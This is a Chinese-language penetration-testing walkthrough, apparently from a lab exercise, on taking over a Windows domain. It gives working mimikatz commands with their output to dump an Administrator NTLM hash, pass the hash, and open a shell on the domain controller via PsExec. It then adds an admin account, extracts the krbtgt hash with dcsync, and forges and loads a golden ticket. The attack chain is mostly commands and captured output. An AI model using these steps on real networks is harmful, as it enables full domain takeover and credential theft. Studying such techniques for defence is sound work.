内网往往有好多台服务器组成集群,为了方便管理,windwos系统可以通过域批量管理;管理员直接操作的服务器称为控制器,能操控域里面所有的节点,概念上类似于master;其余节点可通过master批量被操作,概念上类似于slave,俗称客户机;拿下控制节点,就等于拿下了整个域;
1、这里假设先拿下了一台客户机,远程桌面登陆,上传猕猴桃,先扫描内存,找到域下面的administrator账号,:
Authentication Id : 0 ; 381160 (00000000:0005d0e8)
Session : RemoteInteractive from 3
User Name : administrator
Domain : ZKAQ
Logon Server : DC
Logon Time : 2020/6/20 19:36:09
SID : S-1-5-21-4098506371-3349406080-1400905760-500
msv :
[00000003] Primary
* Username : Administrator
* Domain : ZKAQ
* NTLM : 61465a991b168727b65b3644aab823cd
* SHA1 : 5b48c7f5a5facbb5df950bb501b9da8dcd86db3d
[00010000] CredentialKeys
* NTLM : 61465a991b168727b65b3644aab823cd
* SHA1 : 5b48c7f5a5facbb5df950bb501b9da8dcd86db3d
tspkg :
wdigest :
* Username : Administrator
* Domain : ZKAQ
* Password : (null)
kerberos :
* Username : administrator
* Domain : ZKAQ.CN
* Password : (null)
ssp :
credman :
这里有几个关键信息:(1)domain名字:ZKAQ.CN (2)账号的NTLM值,下面用该值做hash传递(数据库一般也不会存密码,都是比对hash值,所以这里直接用hash值,没必要用明文密码);构造的命令:sekurlsa::pth /user:administrator /domain:"ZKAQ.CN" /ntlm:61465a991b168727b65b3644aab823cd; 命令成功执行后,重新生成一个cmd窗口;尝试用dir命令,发现能返回控制器C盘的文件;这里说明hash传递是成功的!
2、打开控制器的cmd,命令如下:PsExec.exe \DC.ZKAQ.CN cmd , 成功打开了控制器的cmd;
C盘下和刚才在客户机打开看到的一样:
创建用户,并加入管理员组(不过动静有点大,容易被察觉,可以试试用黄金票据)
成功登陆域控制器:
3、(1)登陆域控制器后,继续上传猕猴桃,运行lsadump::dcsync /user:krbtgt得到结果如下:
mimikatz # lsadump::dcsync /user:krbtgt
[DC] 'zkaq.cn' will be the domain
[DC] 'DC.zkaq.cn' will be the DC server
[DC] 'krbtgt' will be the user account
Object RDN : krbtgt
** SAM ACCOUNT **
SAM Username : krbtgt
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration :
Password last change : 2020/6/14 23:47:11
Object Security ID : S-1-5-21-4098506371-3349406080-1400905760-502
Object Relative ID : 502
Credentials:
Hash NTLM: 9f7afad7acc9f72b7e338b908795b7da
ntlm- 0: 9f7afad7acc9f72b7e338b908795b7da
lm - 0: 614731ed84bc1bf9f60798aa91f297bd
其中两个关键的信息:
SID:S-1-5-21-4098506371-3349406080-1400905760-502
hash NTLM:9f7afad7acc9f72b7e338b908795b7da
(2)制作黄金票据,在客户机运行:kerberos::golden /admin:administrator /domain:zkaq.cn /sid:S-1-5-21-4098506371-3349406080-1400905760 /krbtgt:9f7afad7acc9f72b7e338b908795b7da /ticket:administrator.kiribi
加载黄金票据:kerberos::ptt administrator.kiribi
再在客户机开个普通的窗口运行KLIST,发现黄金票据的有效期到2030年;
(4)在客户机的普通窗口运行dir \dc.zkaq.cnc$,能正常查看C盘的文件,说明黄金票据生效!之前在域空机器建的diqizi账户可以删了;
总结:关键的地方
1、hash传递:用猕猴桃扫描内存,得到的是hash后的密码,这里没必要硬杠去破解,直接用现成的hash值发送到域控制器去验证,因为数据库一般也不会存明文,而是存hash值;
2、hash传递成功后,在新的cmd中用windows官方提供的PsExec.exe \DC.ZKAQ.CN cmd 在域控制器中再生成新cmd,这时已经是域控制器的administrator权限了,可以添加自己的用户,再用远程登陆连接;
3、登陆域控制器,运行猕猴桃,找到sid和hash NTLM;然后在客户机的猕猴桃制作和加载黄金票据,最后在客户机的普通cmd窗口验证;
4、内网渗透核心步骤和操作思路总结如下:
